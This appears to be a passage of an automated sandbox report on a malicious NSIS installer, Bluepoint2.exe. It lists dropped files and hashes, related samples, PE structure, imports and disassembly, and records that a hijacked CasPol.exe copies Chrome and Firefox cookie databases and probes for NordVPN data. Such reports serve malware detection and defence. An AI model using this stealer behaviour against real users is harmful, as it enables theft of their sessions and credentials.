                                                                                    Dropped Files

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                    C:\Users\user\AppData\Local\Temp\lang-1026.dllBluepoint2.exeGet hashmaliciousBrowse
                                                                                      SD 2477.exeGet hashmaliciousBrowse
                                                                                        SD 2477.exeGet hashmaliciousBrowse
                                                                                          C:\Users\user\AppData\Local\Temp\nsh937B.tmp\System.dllBluepoint2.exeGet hashmaliciousBrowse
                                                                                            SecuriteInfo.com.W32.AIDetect.malware2.8516.exeGet hashmaliciousBrowse
                                                                                              SecuriteInfo.com.W32.AIDetect.malware2.8516.exeGet hashmaliciousBrowse
                                                                                                SD 2477.exeGet hashmaliciousBrowse
                                                                                                  SD 2477.exeGet hashmaliciousBrowse
                                                                                                    aSsc9zh1ex.exeGet hashmaliciousBrowse
                                                                                                      aSsc9zh1ex.exeGet hashmaliciousBrowse
                                                                                                        TransportLabel_6170453602.xlsxGet hashmaliciousBrowse
                                                                                                          PO#4200000866.exeGet hashmaliciousBrowse
                                                                                                            PO#4200000866.exeGet hashmaliciousBrowse
                                                                                                              Transferencia.exeGet hashmaliciousBrowse
                                                                                                                Transferencia.exeGet hashmaliciousBrowse
                                                                                                                  EPAYMENT.exeGet hashmaliciousBrowse
                                                                                                                    EPAYMENT.exeGet hashmaliciousBrowse
                                                                                                                      xcVh7ZmH4Y.exeGet hashmaliciousBrowse
                                                                                                                        OR17233976_00019489_20170619154218.xlsxGet hashmaliciousBrowse
                                                                                                                          xcVh7ZmH4Y.exeGet hashmaliciousBrowse
                                                                                                                            3GJ6S3Kwnb.exeGet hashmaliciousBrowse
                                                                                                                              3GJ6S3Kwnb.exeGet hashmaliciousBrowse
                                                                                                                                file.exeGet hashmaliciousBrowse

                                                                                                                                  Created / dropped Files

                                                                                                                                  C:\Users\user\AppData\Local\Temp\Wigwamer.Cro7

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\Desktop\Bluepoint2.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):129284
                                                                                                                                  Entropy (8bit):7.157189090297081
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:1536:CsBTmuLAZFPa47dQCcpHFoY0uGAJ5BfmZi+RSxmQMGEvO/Tc/M4aJtp9N5Ki5fcb:COzYUWXcNwCmZi+0IPvOwMZvp3jfcvz
                                                                                                                                  MD5:F61E66C8CD7F81A887EA6273F4C9976B
                                                                                                                                  SHA1:CBCC8B26E456B3F68D1973B02805E88E1D785C9F
                                                                                                                                  SHA-256:94FBA9DEAF2EFEE1AB3D8B92DB5712EB78A57F446C339E7A457D561FB74F9124
                                                                                                                                  SHA-512:0D956030378A7E9DBBB461F802BE73B173C45EB60DF2158D0BB345F1D1291172B092BEC16706B9C568580F379F45384344052D70417F4B98336A36067F082B23
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:low
                                                                                                                                  Preview:.<4.N...l.a..W!..d.jh.r..o...u....l..7.=....c=..r....,.o,...f........y....].....Uia?...f.+A..jI>......b....s......Zp..W.r.g7U:=|_....eC.F...f.......~.h.f5...x.Dv...o.....oI.....)i:.hg....5....2EZ..4.l........P.&...:&.eo.((.^A.".d...(bR.h.K.jmuRz~....;.\T.[gI]W.E..m..V..6.oa........g.....o..&..K....!.n..A.I.$..%....^.B7P.<E.-......8]K......9...........\k....A...k@."..~.0....D.F..u.N!...jon+0^2.w.O.f..w;..8..^r..*;$Vs...bk^......#]zQ}cp...{G...=C........'.k...6.c....^..-..BJ).+.nTY.U...^.g.1..{.d.?B.+.#kH.....X.lzU.P.Cx.`............Z..V...b...T.@Y..VH....Y.K.9a.P.b.......l........i.H...4....}.z.......t....Fv.....F..7E.P.P......q...x+......%.,..."..^........&...g.?.FtL...R.....D~Y1#...E%......1!sV'.P..v.&S....N}..|...8..Dt.!_.'.e.0n8..V...o..?l.....l.....q.>...KK...79..R....)...H...5 .g.q........<.h....2M.?E...A;+.....0.P......yX....y...t.).0...Hs..\.k.5y.^..t8.fg+s.H..Z..<...../orFU7..~8...Q.l....!.....n.RClg..a..Q...W.....d..b..-..n.umq&#...[.r....E.

                                                                                                                                  C:\Users\user\AppData\Local\Temp\emblem-default-symbolic.symbolic.png

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\Desktop\Bluepoint2.exe
                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):288
                                                                                                                                  Entropy (8bit):7.002703251110111
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:6:6v/lhPysDjYOGW78zHS1w9xuIGXdvkFRBp9rXHEb/GY1IX2NYKjp:6v/7jjYOGW7Rw9xu6pxHG/VIX6F
                                                                                                                                  MD5:A83F8C904AFA9E3F6A50D263747CF6DF
                                                                                                                                  SHA1:7B9D99B950518FCAF5AC59350823D2B20E82956F
                                                                                                                                  SHA-256:F57C0B31EC836E26EB609F259CFA68DDA95F09685784423B61075DAE4BBA5BF6
                                                                                                                                  SHA-512:4B2DC243E86514BDC816B92808C491EF71B72690F25C2372FE909CED3A103F990708C507065169FA5C6F823A8B1ADADB7BF13696E78C807A973789CF14CA3A06
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:low
                                                                                                                                  Preview:.PNG........IHDR................a....sBIT....|.d.....IDAT8...N.Q...'.....X.s.^../H.f.....BJ....V[.b..qsvA..d..y.9?...z.`./....'..[.Q..'...M.....mwuN.\....h..(|........p.K..I.%..... ..*..x.t~.kW.`V'.8.W.K.l.4..9.&\..k..3F........4.0.op.rL#.....N:.=.T.[....L.....p...#....IEND.B`.

                                                                                                                                  C:\Users\user\AppData\Local\Temp\lang-1026.dll

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\Desktop\Bluepoint2.exe
                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):175112
                                                                                                                                  Entropy (8bit):4.206629648207283
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:768:RSlFida9bh1hROyu8YLPiOqdo3Hioanc1rfs648UPU5hTIFUqxtIB870kWZtnJkX:RJryZYLqtboZqFpx+eovZtlffdGUmx
                                                                                                                                  MD5:726030B3909A4C3FD5810F45E55A989D
                                                                                                                                  SHA1:DF628878449CB026352D2A31E98A70BA6632AB0F
                                                                                                                                  SHA-256:5331D12B2F89F2FB013BC4D05FD449D1DCFE7C470A20271CFE13043E74C974EF
                                                                                                                                  SHA-512:41EE067BCDA5D83B854419487BBBE1A9259AFB090F513EF671BC05D6B0EB865D62CFBB5104FBFD162788A0B8FB340B78EECE67EBE780219C7CAB4201550FA6E9
                                                                                                                                  Malicious:false
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                  Joe Sandbox View:
                                                                                                                                  • Filename: Bluepoint2.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: SD 2477.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: SD 2477.exe, Detection: malicious, Browse
                                                                                                                                  Reputation:low
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<...R...R...R.@...R.@.P...R.Rich..R.................PE..L....\)b...........!................................................................".....@.......................................... ................... ...........................................................................................rdata..p...........................@..@.rsrc........ ......................@..@.....\)b........T........................rdata......T....rdata$zzzdbg.... ... ...rsrc$01.....@..Hf...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                  C:\Users\user\AppData\Local\Temp\network-cellular-hardware-disabled-symbolic.svg

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\Desktop\Bluepoint2.exe
                                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                                  Category:modified
                                                                                                                                  Size (bytes):1035
                                                                                                                                  Entropy (8bit):5.036414547847537
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:24:t4CjlPIRyDZDZDZ5yKbRAecFhBrN3AGM+pMRg:eONtAecFZTMDg
                                                                                                                                  MD5:28998D417311CCDE1069B6F52E3D099A
                                                                                                                                  SHA1:E7609DCCDE7CB750D2DCC02A2DD360B5D523E995
                                                                                                                                  SHA-256:C6DEAA9F5B658892A04EDA56027A779E3A5CA1F9CFD4E156E594A63B7AADDF00
                                                                                                                                  SHA-512:CD597AD3BD4738F05A2963FE27C38B948F08836C8F18588CC98B457FEE4565D68B379620380A9DE4E6ED3F55331AB3CFB943664B600C36BAB857486D9F2E4EE3
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16">. <g fill="#2e3436">. <path d="m 164,249 v 1.5 4.5 h 3 v -4.5 -1.5 z m -4,3 v 1.5 1.5 h 3 v -1.5 -1.5 z m -8,8 v 1.5 1.5 h 3 v -1.5 -1.5 z m 4,0 v 1.5 1.5 h 3 v -1.5 -1.5 z m 4,0 v 1.5 1.5 h 3 v -1.5 -1.5 z m 4,0 v 1.5 1.5 h 3 v -1.5 -1.5 z" style="line-height:normal;font-variant-ligatures:normal;font-variant-position:normal;font-variant-caps:normal;font-variant-numeric:normal;font-variant-alternates:normal;font-feature-settings:normal;text-indent:0;text-align:start;text-decoration-line:none;text-decoration-style:solid;text-decoration-color:#000;text-transform:none;text-orientation:mixed;white-space:normal;shape-padding:0;isolation:auto;mix-blend-mode:normal;solid-color:#000;solid-opacity:1" color="#000" font-weight="400" font-family="sans-serif" overflow="visible" opacity=".35" fill-rule="evenodd" transform="translate(-152 -248)"/>. <path d="M 151.99995,256.00012 H 168 V 259 h -16.00005 z" transform="trans

                                                                                                                                  C:\Users\user\AppData\Local\Temp\nsh937B.tmp\System.dll

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\Desktop\Bluepoint2.exe
                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):12288
                                                                                                                                  Entropy (8bit):5.814115788739565
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
                                                                                                                                  MD5:CFF85C549D536F651D4FB8387F1976F2
                                                                                                                                  SHA1:D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
                                                                                                                                  SHA-256:8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
                                                                                                                                  SHA-512:531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
                                                                                                                                  Malicious:false
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                  Joe Sandbox View:
                                                                                                                                  • Filename: Bluepoint2.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: SecuriteInfo.com.W32.AIDetect.malware2.8516.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: SecuriteInfo.com.W32.AIDetect.malware2.8516.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: SD 2477.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: SD 2477.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: aSsc9zh1ex.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: aSsc9zh1ex.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: TransportLabel_6170453602.xlsx, Detection: malicious, Browse
                                                                                                                                  • Filename: PO#4200000866.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: PO#4200000866.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: Transferencia.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: Transferencia.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: EPAYMENT.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: EPAYMENT.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: xcVh7ZmH4Y.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: OR17233976_00019489_20170619154218.xlsx, Detection: malicious, Browse
                                                                                                                                  • Filename: xcVh7ZmH4Y.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: 3GJ6S3Kwnb.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: 3GJ6S3Kwnb.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                  C:\Users\user\AppData\Roaming\5eczunoo.5pr\Chrome\Default\Cookies

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3036000
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):98304
                                                                                                                                  Entropy (8bit):2.9216957692876595
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:384:ST8XNcKu0iTwbAziYN570RMZXVuKnQM2V6ofbDO4xmTgZcZygSA2O9RVHfwrhhxV:JNcgiD5Q6luKQM2V7DXcAgSA2KD4jL
                                                                                                                                  MD5:1A706D20E96086886B5D00D9698E09DF
                                                                                                                                  SHA1:DACF81D90647457585345BEDD6DE222E83FDE01F
                                                                                                                                  SHA-256:759F62B61AA65D6D5FAC95086B26D1D053CE1FB24A8A0537ACB42DDF45D2F19F
                                                                                                                                  SHA-512:CFF7D42AA3B089759C5ACE934A098009D1A58111FE7D99AC7669B7F0A1C973907FD16A4DC1F37B5BE5252EC51B8D876511F4F6317583FA9CC48897B1B913C7F3
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:SQLite format 3......@ ...$...................................................................$..S`.........g.....[.[.[................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                  C:\Users\user\AppData\Roaming\5eczunoo.5pr\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqlite

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                                                                                                  File Type:SQLite 3.x database, user version 12, last written using SQLite version 3036000
                                                                                                                                  Category:modified
                                                                                                                                  Size (bytes):98304
                                                                                                                                  Entropy (8bit):0.08231524779339361
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:12:DQANJfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQANJff32mNVpP965Ra8KN0MG/lO
                                                                                                                                  MD5:886A5F9308577FDF19279AA582D0024D
                                                                                                                                  SHA1:CDCCC11837CDDB657EB0EF6A01202451ECDF4992
                                                                                                                                  SHA-256:BA7EB45B7E9B6990BC63BE63836B74FA2CCB64DCD0C199056B6AE37B1AE735F2
                                                                                                                                  SHA-512:FF0692E52368708B36C161A4BFA91EE01CCA1B86F66666F7FC4979C6792D598FF7720A9FAF258F61439DAD61DB55C50D992E99769B1E4D321EC5B98230684BC5
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................S`.....}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                  \Device\ConDrv

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):30
                                                                                                                                  Entropy (8bit):3.964735178725505
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:IBVFBWAGRHneyy:ITqAGRHner
                                                                                                                                  MD5:9F754B47B351EF0FC32527B541420595
                                                                                                                                  SHA1:006C66220B33E98C725B73495FE97B3291CE14D9
                                                                                                                                  SHA-256:0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
                                                                                                                                  SHA-512:C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:NordVPN directory not found!..

                                                                                                                                  Static File Info

                                                                                                                                  General

                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                  Entropy (8bit):7.834012132829794
                                                                                                                                  TrID:
                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                  File name:Bluepoint2.exe
                                                                                                                                  File size:184424
                                                                                                                                  MD5:c792c744dde586c896d6ca8cceb0e04a
                                                                                                                                  SHA1:66273efb747ba478fc7c2122f647c0a01d16c4ca
                                                                                                                                  SHA256:4385dcd25c41dcc70603b48daa969cb455c6fd605f7b3a7e6088557b9ab4964a
                                                                                                                                  SHA512:fefb74d8bcdeb5dee67a8fc3473169e2738d1edbdd876aa07b2ef6645d555de9c2b83c39aba66ed84a44159caf30a089226cabaea083e37cafce446ece1cc1f5
                                                                                                                                  SSDEEP:3072:RfY/TU9fE9PEtu4bDDq6VG3dGmKdKFXKX+d2Q1Wi+hZUKqSccz5xqBES1CXF6DYT:9Ya6wC6cdOEcm2Q1ahZUKQcFxw/1CXFF
                                                                                                                                  TLSH:6C04020827B0C453FA6707F24E78877A7FA5B91158E5924F13A01F85BD72B439A0E35E
                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................h...*.....

                                                                                                                                  File Icon

                                                                                                                                  Icon Hash:b2a88c96b2ca6a72

                                                                                                                                  Static PE Info

                                                                                                                                  General

                                                                                                                                  Entrypoint:0x403640
                                                                                                                                  Entrypoint Section:.text
                                                                                                                                  Digitally signed:true
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  Subsystem:windows gui
                                                                                                                                  Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                                                                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                                                  Time Stamp:0x614F9B1F [Sat Sep 25 21:56:47 2021 UTC]
                                                                                                                                  TLS Callbacks:
                                                                                                                                  CLR (.Net) Version:
                                                                                                                                  OS Version Major:4
                                                                                                                                  OS Version Minor:0
                                                                                                                                  File Version Major:4
                                                                                                                                  File Version Minor:0
                                                                                                                                  Subsystem Version Major:4
                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                  Import Hash:61259b55b8912888e90f516ca08dc514

                                                                                                                                  Authenticode Signature

                                                                                                                                  Signature Valid:false
                                                                                                                                  Signature Issuer:CN="ejerstruktur ZAMBISKE Repetr ", O=STEFANIES, L=Baleix, S=Nouvelle-Aquitaine, C=FR
                                                                                                                                  Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                                                  Error Number:-2146762487
                                                                                                                                  Not Before, Not After
                                                                                                                                  • 10/05/2022 14:17:21 10/05/2023 14:17:21
                                                                                                                                  Subject Chain
                                                                                                                                  • CN="ejerstruktur ZAMBISKE Repetr ", O=STEFANIES, L=Baleix, S=Nouvelle-Aquitaine, C=FR
                                                                                                                                  Version:3
                                                                                                                                  Thumbprint MD5:ECE32C08ED1569491D6E0771D9F12FDD
                                                                                                                                  Thumbprint SHA-1:A0A9159D8C4470704C1D11504D0D6AC6D8000739
                                                                                                                                  Thumbprint SHA-256:49F7287CD8102A1348A82B7E5F178A55D3F409C7C7AB7E438905EBB0167CABE9
                                                                                                                                  Serial:8C8E40F414473723

                                                                                                                                  Entrypoint Preview

                                                                                                                                  Instruction
                                                                                                                                  push ebp
                                                                                                                                  mov ebp, esp
                                                                                                                                  sub esp, 000003F4h
                                                                                                                                  push ebx
                                                                                                                                  push esi
                                                                                                                                  push edi
                                                                                                                                  push 00000020h
                                                                                                                                  pop edi
                                                                                                                                  xor ebx, ebx
                                                                                                                                  push 00008001h
                                                                                                                                  mov dword ptr [ebp-14h], ebx
                                                                                                                                  mov dword ptr [ebp-04h], 0040A230h
                                                                                                                                  mov dword ptr [ebp-10h], ebx
                                                                                                                                  call dword ptr [004080C8h]
                                                                                                                                  mov esi, dword ptr [004080CCh]
                                                                                                                                  lea eax, dword ptr [ebp-00000140h]
                                                                                                                                  push eax
                                                                                                                                  mov dword ptr [ebp-0000012Ch], ebx
                                                                                                                                  mov dword ptr [ebp-2Ch], ebx
                                                                                                                                  mov dword ptr [ebp-28h], ebx
                                                                                                                                  mov dword ptr [ebp-00000140h], 0000011Ch
                                                                                                                                  call esi
                                                                                                                                  test eax, eax
                                                                                                                                  jne 00007F53A49D959Ah
                                                                                                                                  lea eax, dword ptr [ebp-00000140h]
                                                                                                                                  mov dword ptr [ebp-00000140h], 00000114h
                                                                                                                                  push eax
                                                                                                                                  call esi
                                                                                                                                  mov ax, word ptr [ebp-0000012Ch]
                                                                                                                                  mov ecx, dword ptr [ebp-00000112h]
                                                                                                                                  sub ax, 00000053h
                                                                                                                                  add ecx, FFFFFFD0h
                                                                                                                                  neg ax
                                                                                                                                  sbb eax, eax
                                                                                                                                  mov byte ptr [ebp-26h], 00000004h
                                                                                                                                  not eax
                                                                                                                                  and eax, ecx
                                                                                                                                  mov word ptr [ebp-2Ch], ax
                                                                                                                                  cmp dword ptr [ebp-0000013Ch], 0Ah
                                                                                                                                  jnc 00007F53A49D956Ah
                                                                                                                                  and word ptr [ebp-00000132h], 0000h
                                                                                                                                  mov eax, dword ptr [ebp-00000134h]
                                                                                                                                  movzx ecx, byte ptr [ebp-00000138h]
                                                                                                                                  mov dword ptr [0042A318h], eax
                                                                                                                                  xor eax, eax
                                                                                                                                  mov ah, byte ptr [ebp-0000013Ch]
                                                                                                                                  movzx eax, ax
                                                                                                                                  or eax, ecx
                                                                                                                                  xor ecx, ecx
                                                                                                                                  mov ch, byte ptr [ebp-2Ch]
                                                                                                                                  movzx ecx, cx
                                                                                                                                  shl eax, 10h
                                                                                                                                  or eax, ecx

                                                                                                                                  Rich Headers

                                                                                                                                  Programming Language:
                                                                                                                                  • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                                                  Data Directories

                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x430000x11d0.rsrc
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x2bbb80x14b0.ndata
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                  Sections

                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                  .text0x10000x66760x6800False0.656813401442data6.41745998719IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                  .rdata0x80000x139a0x1400False0.4498046875data5.14106681717IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                  .data0xa0000x203780x600False0.509765625data4.11058212765IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                  .ndata0x2b0000x180000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                  .rsrc0x430000x11d00x1200False0.368489583333data4.47140482911IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                  Resources

                                                                                                                                  NameRVASizeTypeLanguageCountry
                                                                                                                                  RT_BITMAP0x432680x368dataEnglishUnited States
                                                                                                                                  RT_ICON0x435d00x2e8dataEnglishUnited States
                                                                                                                                  RT_DIALOG0x438b80xb8dataEnglishUnited States
                                                                                                                                  RT_DIALOG0x439700x144dataEnglishUnited States
                                                                                                                                  RT_DIALOG0x43ab80x13cdataEnglishUnited States
                                                                                                                                  RT_DIALOG0x43bf80x100dataEnglishUnited States
                                                                                                                                  RT_DIALOG0x43cf80x11cdataEnglishUnited States
                                                                                                                                  RT_DIALOG0x43e180x60dataEnglishUnited States
                                                                                                                                  RT_GROUP_ICON0x43e780x14dataEnglishUnited States
                                                                                                                                  RT_MANIFEST0x43e900x33eXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                                                                                                  Imports

                                                                                                                                  DLLImport
                                                                                                                                  ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                                                                                                                                  SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                                                                                                                                  ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                                                                                                                                  COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                                                                                                  USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                                                                                                                                  GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
